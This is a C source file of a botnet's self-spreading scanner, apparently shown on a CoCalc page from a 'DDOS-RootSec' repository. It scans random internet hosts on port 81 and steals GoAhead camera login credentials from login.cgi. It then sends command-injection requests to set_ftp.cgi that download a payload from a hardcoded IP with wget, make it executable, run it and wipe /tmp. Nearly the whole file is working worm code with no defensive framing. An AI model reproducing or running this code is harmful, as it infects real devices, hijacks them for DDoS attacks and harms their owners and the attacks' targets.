CoCalc -- goahead.c

GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Self Reps/GOAHEAD/goahead.c
⁵⁰³⁸ views
1
#define _GNU_SOURCE
2

3
#ifdef DEBUG
4
    #include <stdio.h>
5
#endif
6
#include <unistd.h>
7
#include <stdlib.h>
8
#include <sys/socket.h>
9
#include <arpa/inet.h>
10
#include <sys/select.h>
11
#include <sys/types.h>
12
#include <time.h>
13
#include <fcntl.h>
14
#include <signal.h>
15
#include <errno.h>
16
#include <string.h>
17
#include <linux/ip.h>
18
#include <linux/tcp.h>
19

20
#include "includes.h"
21
#include "goahead.h"
22
#include "table.h"
23
#include "rand.h"
24
#include "util.h"
25
#include "checksum.h"
26

27
int scanner_pid = 0, rsck = 0, rsck_out = 0, auth_table_len = 0;
28
char scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};
29
struct scanner_auth *auth_table = NULL;
30
struct scanner_connection *conn_table;
31
uint16_t auth_table_max_weight = 0;
32
uint32_t fake_time = 0;
33

34
int recv_strip_null(int sock, void *buf, int len, int flags)
35
{
36
    int ret = recv(sock, buf, len, flags);
37

38
    if(ret > 0)
39
    {
40
        int i = 0;
41

42
        for(i = 0; i < ret; i++)
43
        {
44
            if(((char *)buf)[i] == 0x00)
45
            {
46
                ((char *)buf)[i] = 'A';
47
            }
48
        }
49
    }
50

51
    return ret;
52
}
53

54
void scanner_init(void)
55
{
56
    int i = 0;
57
    uint16_t source_port;
58
    struct iphdr *iph;
59
    struct tcphdr *tcph;
60

61
    // Let parent continue on main thread
62
    scanner_pid = fork();
63
    if(scanner_pid > 0 || scanner_pid == -1)
64
        return;
65

66
    LOCAL_ADDR = util_local_addr();
67

68
    rand_init();
69
    fake_time = time(NULL);
70
    conn_table = calloc(SCANNER_MAX_CONNS, sizeof(struct scanner_connection));
71
    for(i = 0; i < SCANNER_MAX_CONNS; i++)
72
    {
73
        conn_table[i].state = SC_CLOSED;
74
        conn_table[i].fd = -1;
75
        conn_table[i].credential_index = 0;
76
    }
77

78
    // Set up raw socket scanning and payload
79
    if((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
80
    {
81
        #ifdef DEBUG
82
            printf("[scanner] failed to initialize raw socket, cannot scan\n");
83
        #endif
84
        exit(0);
85
    }
86
    fcntl(rsck, F_SETFL, O_NONBLOCK | fcntl(rsck, F_GETFL, 0));
87
    i = 1;
88
    if(setsockopt(rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)
89
    {
90
        #ifdef DEBUG
91
            printf("[scanner] failed to set IP_HDRINCL, cannot scan\n");
92
        #endif
93
        close(rsck);
94
        exit(0);
95
    }
96

97
    do
98
    {
99
        source_port = rand_next() & 0xffff;
100
    }
101
    while(ntohs(source_port) < 1024);
102

103
    iph = (struct iphdr *)scanner_rawpkt;
104
    tcph = (struct tcphdr *)(iph + 1);
105

106
    // Set up IPv4 header
107
    iph->ihl = 5;
108
    iph->version = 4;
109
    iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));
110
    iph->id = rand_next();
111
    iph->ttl = 64;
112
    iph->protocol = IPPROTO_TCP;
113

114
    // Set up TCP header
115
    tcph->dest = htons(81);
116
    tcph->source = source_port;
117
    tcph->doff = 5;
118
    tcph->window = rand_next() & 0xffff;
119
    tcph->syn = TRUE;
120

121
    #ifdef DEBUG
122
        printf("[scanner] scanner process initialized. scanning started.\n");
123
    #endif
124

125
    // Main logic loop
126
    while(TRUE)
127
    {
128
        fd_set fdset_rd, fdset_wr;
129
        struct scanner_connection *conn;
130
        struct timeval tim;
131
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
132

133
        // Spew out SYN to try and get a response
134
        if(fake_time != last_spew)
135
        {
136
            last_spew = fake_time;
137

138
            for(i = 0; i < SCANNER_RAW_PPS; i++)
139
            {
140
                struct sockaddr_in paddr = {0};
141
                struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
142
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
143

144
                iph->id = rand_next();
145
                iph->saddr = LOCAL_ADDR;
146
                iph->daddr = get_random_ip();
147
                iph->check = 0;
148
                iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));
149

150
                tcph->dest = htons(81);
151
                tcph->seq = iph->daddr;
152
                tcph->check = 0;
153
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));
154

155
                paddr.sin_family = AF_INET;
156
                paddr.sin_addr.s_addr = iph->daddr;
157
                paddr.sin_port = tcph->dest;
158

159
                sendto(rsck, scanner_rawpkt, sizeof(scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));
160
            }
161
        }
162

163
        // Read packets from raw socket to get SYN+ACKs
164
        last_avail_conn = 0;
165
        while(TRUE)
166
        {
167
            int n = 0;
168
            char dgram[1514];
169
            struct iphdr *iph = (struct iphdr *)dgram;
170
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
171
            struct scanner_connection *conn;
172

173
            errno = 0;
174
            n = recvfrom(rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);
175
            if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
176
                break;
177

178
            if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))
179
                continue;
180
            if(iph->daddr != LOCAL_ADDR)
181
                continue;
182
            if(iph->protocol != IPPROTO_TCP)
183
                continue;
184
            if(tcph->source != htons(81))
185
                continue;
186
            if(tcph->dest != source_port)
187
                continue;
188
            if(!tcph->syn)
189
                continue;
190
            if(!tcph->ack)
191
                continue;
192
            if(tcph->rst)
193
                continue;
194
            if(tcph->fin)
195
                continue;
196
            if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
197
                continue;
198

199
            conn = NULL;
200
            for(n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
201
            {
202
                if(conn_table[n].state == SC_CLOSED)
203
                {
204
                    conn = &conn_table[n];
205
                    last_avail_conn = n;
206
                    break;
207
                }
208
            }
209

210
            // If there were no slots, then no point reading any more
211
            if(conn == NULL)
212
                break;
213

214
            conn->dst_addr = iph->saddr;
215
            conn->dst_port = tcph->source;
216
            setup_connection(conn);
217
        }
218

219
        FD_ZERO(&fdset_rd);
220
        FD_ZERO(&fdset_wr);
221

222
        for(i = 0; i < SCANNER_MAX_CONNS; i++)
223
        {
224
            int timeout = 5;
225

226
            conn = &conn_table[i];
227
            //timeout = (conn->state > SC_CONNECTING ? 30 : 5);
228

229
            if(conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
230
            {
231
                #ifdef DEBUG
232
                    printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
233
                #endif
234

235
                close(conn->fd);
236
                conn->fd = -1;
237
                conn->state = SC_CLOSED;
238
                free(conn->credentials);
239
                conn->credential_index = 0;
240
                util_zero(conn->rdbuf, sizeof(conn->rdbuf));
241

242
                continue;
243
            }
244

245
            if(conn->state == SC_CONNECTING || conn->state == SC_EXPLOIT_STAGE2 || conn->state == SC_EXPLOIT_STAGE3)
246
            {
247
                FD_SET(conn->fd, &fdset_wr);
248
                if(conn->fd > mfd_wr)
249
                    mfd_wr = conn->fd;
250
            }
251
            else if(conn->state != SC_CLOSED)
252
            {
253
                FD_SET(conn->fd, &fdset_rd);
254
                if(conn->fd > mfd_rd)
255
                    mfd_rd = conn->fd;
256
            }
257
        }
258

259
        tim.tv_usec = 0;
260
        tim.tv_sec = 1;
261
        nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
262
        fake_time = time(NULL);
263

264
        for(i = 0; i < SCANNER_MAX_CONNS; i++)
265
        {
266
            conn = &conn_table[i];
267

268
            if(conn->fd == -1)
269
                continue;
270

271
            if(FD_ISSET(conn->fd, &fdset_wr))
272
            {
273
                int err = 0, ret = 0;
274
                socklen_t err_len = sizeof(err);
275

276
                ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
277
                if(err == 0 && ret == 0)
278
                {
279
                    #ifdef DEBUG
280
                        printf("[scanner] FD%d connected to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);
281
                    #endif
282

283
                    if(conn->state == SC_EXPLOIT_STAGE2)
284
                    {
285
                        #ifdef DEBUG
286
                            printf("[scanner] FD%d login extraction successful, continuing with stage 2 of execution\n", conn->fd);
287
                        #endif
288

289
                        // this example is for goahead
290
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
291
                        util_strcat(conn->payload_buf, conn->credentials[0]);
292
                        util_strcat(conn->payload_buf, "&loginpas=");
293
                        util_strcat(conn->payload_buf, conn->credentials[1]);
294
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e+""cd+/tmp""+>>+/tmp/t%29 HTTP/1.0\r\n\r\n");
295
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
296
                        util_strcat(conn->payload_buf, conn->credentials[0]);
297
                        util_strcat(conn->payload_buf, "&loginpas=");
298
                        util_strcat(conn->payload_buf, conn->credentials[1]);
299
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e+""wget+http:/\/167.99.88.89/a""+>>+/tmp/t%29 HTTP/1.0\r\n\r\n");
300
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
301
                        util_strcat(conn->payload_buf, conn->credentials[0]);
302
                        util_strcat(conn->payload_buf, "&loginpas=");
303
                        util_strcat(conn->payload_buf, conn->credentials[1]);
304
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e+""chmod+777+/tmp/a""+>>+/tmp/t%29 HTTP/1.0\r\n\r\n");
305
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
306
                        util_strcat(conn->payload_buf, conn->credentials[0]);
307
                        util_strcat(conn->payload_buf, "&loginpas=");
308
                        util_strcat(conn->payload_buf, conn->credentials[1]);
309
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e""/tmp/a""+>>+/tmp/t%29 HTTP/1.0\r\n\r\n");
310
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
311
                        util_strcat(conn->payload_buf, conn->credentials[0]);
312
                        util_strcat(conn->payload_buf, "&loginpas=");
313
                        util_strcat(conn->payload_buf, conn->credentials[1]);
314
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28rm+-rf+/tmp/*%29 HTTP/1.0\r\n\r\n");
315

316
                        // actually send the payload
317
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);
318

319
                        // clear the payload buffer
320
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));
321

322
                        // clear the socket buffer
323
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
324

325
                        close(conn->fd);
326
                        setup_connection(conn);
327
                        conn->credential_index = 0;
328
                        conn->state = SC_EXPLOIT_STAGE3;
329

330
                        continue;
331
                    }
332
                    else if(conn->state == SC_EXPLOIT_STAGE3)
333
                    {
334
                        #ifdef DEBUG
335
                            printf("[scanner] FD%d sending final command to complete the exploit (stage 3)\n", conn->fd);
336
                        #endif
337

338
                        // build stage 3 payload
339
                        util_strcpy(conn->payload_buf2, "GET /ftptest.cgi?loginuse=");
340
                        util_strcat(conn->payload_buf2, conn->credentials[0]);
341
                        util_strcat(conn->payload_buf2, "&loginpas=");
342
                        util_strcat(conn->payload_buf2, conn->credentials[1]);
343
                        util_strcat(conn->payload_buf2, " HTTP/1.0\r\n\r\n");
344

345
                        // actually send the payload
346
                        send(conn->fd, conn->payload_buf2, util_strlen(conn->payload_buf2), MSG_NOSIGNAL);
347

348
                        // clear the payload buffer
349
                        util_zero(conn->payload_buf2, sizeof(conn->payload_buf2));
350

351
                        // clear the socket buffer
352
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
353

354
                        // reset stuff
355
                        free(conn->credentials);
356
                        conn->credential_index = 0;
357

358
                        close(conn->fd);
359
                        conn->fd = -1;
360
                        conn->state = SC_CLOSED;
361

362
                        continue;
363
                    }
364
                    else
365
                    {
366
                        #ifdef DEBUG
367
                            printf("[scanner] FD%d preparing to retrieve credentials (stage %d)\n", conn->fd, conn->state);
368
                        #endif
369

370
                        conn->credentials = malloc(256);
371
                        send(conn->fd, "GET login.cgi HTTP/1.0\r\n\r\n", 26, MSG_NOSIGNAL);
372
                        conn->state = SC_GET_CREDENTIALS;
373
                    }
374
                }
375
                else
376
                {
377
                    #ifdef DEBUG
378
                        printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
379
                    #endif
380

381
                    close(conn->fd);
382
                    conn->fd = -1;
383
                    conn->state = SC_CLOSED;
384

385
                    continue;
386
                }
387
            }
388

389
            if(FD_ISSET(conn->fd, &fdset_rd))
390
            {
391
                while(TRUE)
392
                {
393
                    int ret = 0;
394

395
                    if(conn->state == SC_CLOSED)
396
                        break;
397

398
                    if(conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
399
                    {
400
                        memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
401
                        conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
402
                    }
403

404
                    errno = 0;
405
                    ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
406
                    if(ret == 0)
407
                    {
408
                        #ifdef DEBUG
409
                            printf("[scanner] FD%d connection gracefully closed (stage %d)\n", conn->fd, conn->state);
410
                        #endif
411
                        errno = ECONNRESET;
412
                        ret = -1;
413
                    }
414
                    if(ret == -1)
415
                    {
416
                        if(errno != EAGAIN && errno != EWOULDBLOCK)
417
                        {
418
                            if(conn->state == SC_EXPLOIT_STAGE2)
419
                            {
420
                                #ifdef DEBUG
421
                                    printf("[scanner] FD%d resetting connection preparing to continue with stage 2 of the exploit\n", conn->fd);
422
                                #endif
423
                                close(conn->fd);
424
                                setup_connection(conn);
425
                                continue;
426
                            }
427

428
                            close(conn->fd);
429
                            conn->fd = -1;
430
                            conn->state = SC_CLOSED;
431
                            free(conn->credentials);
432
                            conn->credential_index = 0;
433
                            util_zero(conn->rdbuf, sizeof(conn->rdbuf));
434
                        }
435
                        break;
436
                    }
437

438
                    conn->rdbuf_pos += ret;
439
                    conn->last_recv = fake_time;
440

441
                    int len = util_strlen(conn->rdbuf);
442
                    conn->rdbuf[len] = 0;
443

444
                    if(conn->state == SC_GET_CREDENTIALS)
445
                    {
446
                        char *out = strtok(conn->rdbuf, " ");
447

448
                        while(out != NULL)
449
                        {
450
                            if(strstr(out, "login"))
451
                            {
452
                                #ifdef DEBUG
453
                                    printf("[scanner] FD%d parsing credentials...\n", conn->fd);
454
                                #endif
455

456
                                memmove(out, out + 11, strlen(out));
457

458
                                int i = 0;
459

460
                                for(i = 0; i < strlen(out); i++)
461
                                {
462
                                    if(out[i] == ';' || out[i] == '"' || out[i] == ' ')
463
                                        out[i] = 0;
464
                                }
465

466
                                conn->credentials[conn->credential_index] = strdup(out);
467
                                conn->credential_index++;
468

469
                            }
470

471
                            out = strtok(NULL, " ");
472
                        }
473
                    }
474

475
                    if(conn->credentials[0] == NULL && conn->credentials[1] == NULL)
476
                    {
477
                        #ifdef DEBUG
478
                            printf("[scanner] FD%d failed to retrieve credentials\n", conn->fd);
479
                        #endif
480
                        close(conn->fd);
481
                        conn->fd = -1;
482
                        conn->state = SC_CLOSED;
483
                        free(conn->credentials);
484
                        conn->credential_index = 0;
485
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
486
                    }
487
                    else
488
                    {
489
                        #ifdef DEBUG
490
                            printf("[scanner] FD%d retrieved user: %s, pass: %s changing exploit stages\n", conn->fd, conn->credentials[0], conn->credentials[1]);
491
                        #endif
492

493
                        close(conn->fd);
494
                        conn->fd = -1;
495
                        conn->state = SC_EXPLOIT_STAGE2;
496
                        conn->credential_index = 0;
497
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
498
                    }
499
                }
500
            }
501
        }
502
    }
503
}
504

505
void scanner_kill(void)
506
{
507
    kill(scanner_pid, 9);
508
}
509

510
static void setup_connection(struct scanner_connection *conn)
511
{
512
    struct sockaddr_in addr = {0};
513

514
    if(conn->fd != -1)
515
        close(conn->fd);
516

517
    if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
518
    {
519
        #ifdef DEBUG
520
            printf("[scanner] failed to call socket()\n");
521
        #endif
522
        return;
523
    }
524

525
    conn->rdbuf_pos = 0;
526
    util_zero(conn->rdbuf, sizeof(conn->rdbuf));
527

528
    fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
529

530
    addr.sin_family = AF_INET;
531
    addr.sin_addr.s_addr = conn->dst_addr;
532
    addr.sin_port = conn->dst_port;
533

534
    conn->last_recv = fake_time;
535

536
    if(conn->state == SC_EXPLOIT_STAGE2 || conn->state == SC_EXPLOIT_STAGE3)
537
    {
538
    }
539
    else
540
    {
541
        conn->state = SC_CONNECTING;
542
    }
543

544
    connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
545
}
546

547
static ipv4_t get_random_ip(void)
548
{
549
    uint32_t tmp;
550
    uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;
551

552
    do
553
    {
554
        tmp = rand_next();
555

556
        o1 = tmp & 0xff;
557
        o2 = (tmp >> 8) & 0xff;
558
        o3 = (tmp >> 16) & 0xff;
559
        o4 = (tmp >> 24) & 0xff;
560
    }
561
    while(o1 == 127 ||                             // 127.0.0.0/8      - Loopback
562
          (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space
563
          (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company
564
          (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company
565
          (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service
566
          (o1 == 10) ||                             // 10.0.0.0/8       - Internal network
567
          (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network
568
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network
569
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved
570
          (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved
571
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use
572
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
573
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
574
    );
575

576
    return INET_ADDR(o1,o2,o3,o4);
577
}
578

579
Product

Resources

Company
